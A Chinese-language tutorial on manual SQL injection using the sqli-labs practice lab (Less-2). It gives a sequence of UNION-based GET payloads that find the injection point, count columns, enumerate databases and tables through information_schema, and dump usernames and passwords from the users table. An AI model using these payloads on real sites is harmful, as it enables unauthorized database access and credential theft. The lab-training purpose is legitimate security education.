SQL注入-SQL注入过程

 SQL注入的过程

手工注入过程

(1) 判断是否存在注入点;

(2) 判断字段长度(字段数);

(3) 判断字段回显位置;

(4) 判断数据库信息;

(5) 查找数据库名;

(6) 查找数据库表;

(7) 查找数据库表中所有字段以及字段值;

(8) 猜解账号密码;

(9) 登录管理员后台;

---

以sql-labs less-2举例

会有提示 请输入ID作为数值参数

Please input the ID as parameter with numeric value

id=1-12 都会返回值 也就是相当于该id列 共有12个值 1-12

---

(1) 判断是否存在注入点;

三步

?id=1'   报错数据库错误

?id=1 and 1=1 成功

?id=1 and 1=2 失败

通过这三点就可以看出 存在注入点并且注入点在url中 属于GET数字型注入点

---

(2) 判断字段长度(字段数);

使用order by排序进行判断

?id=1 and 1= 1 order by 1  对第一列排序 正常显示

?id=1 and 1= 1 order by 2  对第二列排序 正常显示

?id=1 and 1= 1 order by 3  对第三列排序 正常显示

?id=1 and 1= 1 order by 4  对第四列排序 错误显示：Unknown column '4' in 'order clause'

判断出 对前三列排序都是正常显示 对第四列排序显示错误：第四列未知 

使用 union 联合查询进行判断

?id=1 and 1= 1 union select 1                错误显示

?id=1 and 1= 1 union select 1,2             错误显示

?id=1 and 1= 1 union select 1,2,3          正常显示

?id=1 and 1= 1 union select 1,2,3,4       错误显示

判断出 联合查询为3列的时候能与原列数进行拼接 否则报错原因为：所使用的SELECT语句具有不同数量的列 

通过以上两种方法可以判断出 该表的字段数为3

---

(3) 判断字段回显位置;

目前知道有三个字段 但是只回显了两个字段的值 我们应该判断哪些字段是隐藏的 哪些字段是回显出来的

使用and否定前面的查询 使数据库执行union后的查询语句 

已知三个字段 给联合查询 三个常量值 1,2,3进行判断哪些字段显示出来了

?id=1 and 1= 2 union select 1,2,3 

回显的值为2和3，表示 能显示的位置为2号位和3号位也就是2字段和3字段，那么第1个字段就是隐藏位，从这个信息我们就可以的到下一步，如果我们设计payload的时候，我们希望把payload放到2号位和3号位的位置，只有这样我们才能够看到payload的返回结果（如果payload放到1号位 虽然也能执行 但是无法看到执行结果）

---

(4) 判断数据库信息;

获取服务器所有数据库

从目录数据库中进行查找 存放着MYSQL所有的数据库，表，列的名（上面提到过 这个目录数据库的数据库名 目录数据库的表名 目录数据库中表的列名都是固定的）(只演示获取数据库)

?id=1 and 1= 2 union select 1,2,schema_name from information_schema.schemata

schema_name

列有很多个值 但是3号位只能显示第一个值 只能显示第一个数据库的名

使用group_concat()函数聚合函数把当前列所有值连接成字符串 从而返回一个结果集 返回当前服务器存在的所有数据库

?id=1 and 1= 2 union select 1,2,group_concat(schema_name) from information_schema.schemata

---

5 获取当前网站的数据库

?id=1 and 1= 2 union select 1,2,database()

获取到网站数据库名security了 就开始获取security内的表了

---

(6) 查找数据库表;

?id=1 and 1= 2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"

到这我们认为users可能存放着敏感信息于是查询users表中字段名以及字段值

---

(7) 查找数据库表中所有字段以及字段值;

查询users字段名

?id=1 and 1= 2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"

查询每个字段的值

现在已经知道数据库为security表位users 就不需要目录数据库了

使用concat_ws()函数 将每个字段的值以逗号分开结合成字符串

如果不是用该函数3号位只能显示1个字段的一个值 使用后3号位能显示3个字段的3个值

使用limit逐行显示 不使用注释会报错 大概率是与服务器的固定部分语句冲突等原因

?id=1 and 1= 2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1 --

前7步已经得到想要的结果了账号密码了 (8) 猜解账号密码 略过  

当前靶场无登录界面 所以 (9) 登录管理员后台;略过

以上七步的所有结果后不确定是否正确

登录靶机的mysql中 查看security数据库users表中的内容进行验证 发现完全一致

​